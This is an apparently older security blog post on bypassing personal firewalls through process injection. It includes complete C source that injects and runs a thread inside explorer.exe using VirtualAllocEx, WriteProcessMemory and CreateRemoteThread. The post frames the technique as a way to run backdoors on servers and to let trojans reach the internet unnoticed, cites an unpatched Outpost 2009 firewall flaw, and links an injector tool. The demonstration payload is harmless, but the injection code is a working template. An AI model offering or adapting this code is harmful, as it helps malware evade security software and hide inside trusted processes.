3 Jan
How Bypass firewall with Process Injection
Hello Friends .
First question is why Process Injection ?
in this method we can attach evil Process to permitted Process . as you know , firewalls Permit to some Process , like : Internet explorer [IE] or Firefox or windows update or … . this Processes can connect to Internet very well [ often ] .
Process injection , Dll injection , “PE injection “ are methods to bypass firewalls [This Methods called as : Leak Firewall ] .
in dll injection , we injects dll into an application process area, and references to his own malicious DLL to make firewall believes that it’s the application which is using the DLL .
Today when we talk about injection, we are talking about a DLL that is loaded into a running process’s memory. as we know Windows is now designed for this, and injection techniques can be used by any application. Some applications use it to add features to a closed-source program [for example : Babylon Dictionary is One of them ] .
I,m not intend to talk about these [dll ,process Injection ] at this time . and i just want talk about Process injection [ or hijack] to bypass firewalls .
Attention To modeling :
Principle of application run [default ] :
when inclusion of a dynamic library [dll] :
inserting malicious code in the process of confidence :
Used internet Explorer [trusted Software ] for injection :
The following illustration shows the general Code injection with windows API method [virtualAllocEX(),..]
how to Inject Process : [with C cod ]
for firewall bypass we have 4 part :
- Open one process “P”
- Allocate memory remotely in “P” space
- Copy the code to remote process
- Create a thread to execute the code remotely
[will happen]
Example Of Process Injection In EXPLORER.EXE [code ]:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 |
#pragma comment(lib,"Shlwapi.lib")
#pragma comment(lib,"ADVAPI32.LIB")
#include <stdio.h>
#include <windows.h>
#include <Shlwapi.h>
#include <tlhelp32.h>
#define INJECT_EXE "explorer.exe"
typedef struct _RPar
{
DWORD dwDeleteFile;
DWORD dwSleep;
DWORD dwMessageBox;
char Filename[1024];
char string1[1024];
char string2[1024];
} RPar;
DWORD __stdcall ThreadProc(RPar *Para)
{
FARPROC PDeleteFile = (FARPROC)Para->dwDeleteFile;
FARPROC PSleep = (FARPROC)Para->dwSleep;
FARPROC PMessageBox = (FARPROC)Para->dwMessageBox;
PMessageBox(NULL,Para->string1,Para->string2,MB_OK);
while(PDeleteFile(Para->Filename) == 0) {PSleep(1000);}
return 0;
}
int _stdcall WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR lpCmd, int nCmdShow)
{
DWORD dwThreadId,pID=0,dwThreadSize=2048;
void *pRemoteThread;
char ExeFile[1024];
HANDLE hProcess,hSnap;
HINSTANCE hKernel, hUser;
RPar my_RPar,*pmy_RPar;
PROCESSENTRY32 pe32 = {0};
if( (hSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) == INVALID_HANDLE_VALUE )
return 3;
pe32.dwSize = sizeof(PROCESSENTRY32);
Process32First(hSnap, &pe32);
do {
if ( StrCmpNI(INJECT_EXE,pe32.szExeFile,strlen(INJECT_EXE)) == 0)
{
pID=pe32.th32ProcessID;
break;
}
} while (Process32Next(hSnap,&pe32));
if ( hSnap != INVALID_HANDLE_VALUE )
CloseHandle(hSnap);
hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID);
pRemoteThread = VirtualAllocEx(hProcess, 0, dwThreadSize, MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProcess, pRemoteThread, &ThreadProc, dwThreadSize,0);
ZeroMemory(&my_RPar,sizeof(RPar));
hKernel = LoadLibrary( "kernel32.dll");
my_RPar.dwDeleteFile = (DWORD)GetProcAddress(hKernel, "DeleteFileA");
my_RPar.dwSleep = (DWORD)GetProcAddress(hKernel, "Sleep");
hUser = LoadLibrary( "user32.dll");
my_RPar.dwMessageBox = (DWORD)GetProcAddress(hUser, "MessageBoxA");
GetModuleFileName(NULL,ExeFile,1024);
printf (ExeFile);
strcpy(my_RPar.Filename, ExeFile);
strcpy(my_RPar.string1, "HI Abysssec");
strcpy(my_RPar.string2, "OK");
pmy_RPar =(RPar *)VirtualAllocEx (hProcess ,0,sizeof(RPar),MEM_COMMIT,PAGE_READWRITE);
WriteProcessMemory(hProcess ,pmy_RPar,&my_RPar,sizeof my_RPar,0);
CreateRemoteThread(hProcess ,0,0,(DWORD (__stdcall *)(void *))pRemoteThread ,pmy_RPar,0,&dwThreadId);
FreeLibrary(hKernel);
CloseHandle(hProcess);
system("tasklist");
return 0;
} |
what Happens When Firewall bypass ?
in servers :
we can call "Internet explorer" or other trusted Application with [ASP.NET Execute Permission ] and run backdoor in any port .
with this method , we can telnet to open port of server without any worry .
In Client :
Backdoor , Trojans , bad software , connect to internet without Access .
Real Word [ Discovered By Abysssec ] test :
Vulnerability Firewall [Outpost 2009 ] :
http://www.agnitum.com/products/outpost/
You can Inject Process In IE7 or Mozilla Firefox [default Trusted ] .
[Sorry For more information , This bug is not fixed , You can test it with Process Injector tools ].
www.tarasco.org
[pinjector.exe] :
Download Link + source :
http://www.tarasco.org/security/pinjector/index.html
Final deduction:
1- We can Bypass some firewalls : Don't checked Allocated Memory in Trusted Process .
2- Dll , Process , PE injection is useful way to run Process without new Prosess ID [PID] .
In Future :
1- Usage Of these Method In other bypass Protections [hybrid or frees Protection ]
2 - PE INJECTION , why , what , where !?
More Information :
http://www.tarasco.org/security/pinjector/Win32.Design.Flaws.pdf
http://www.firewallleaktester.com/docs/leaktest.pdf
http://www.bluenotch.com/files/Shewmaker-DLL-Injection.pdf
--------------------------------------------------------------------------------------
Happy new year and holy days
god speed you
Daphne
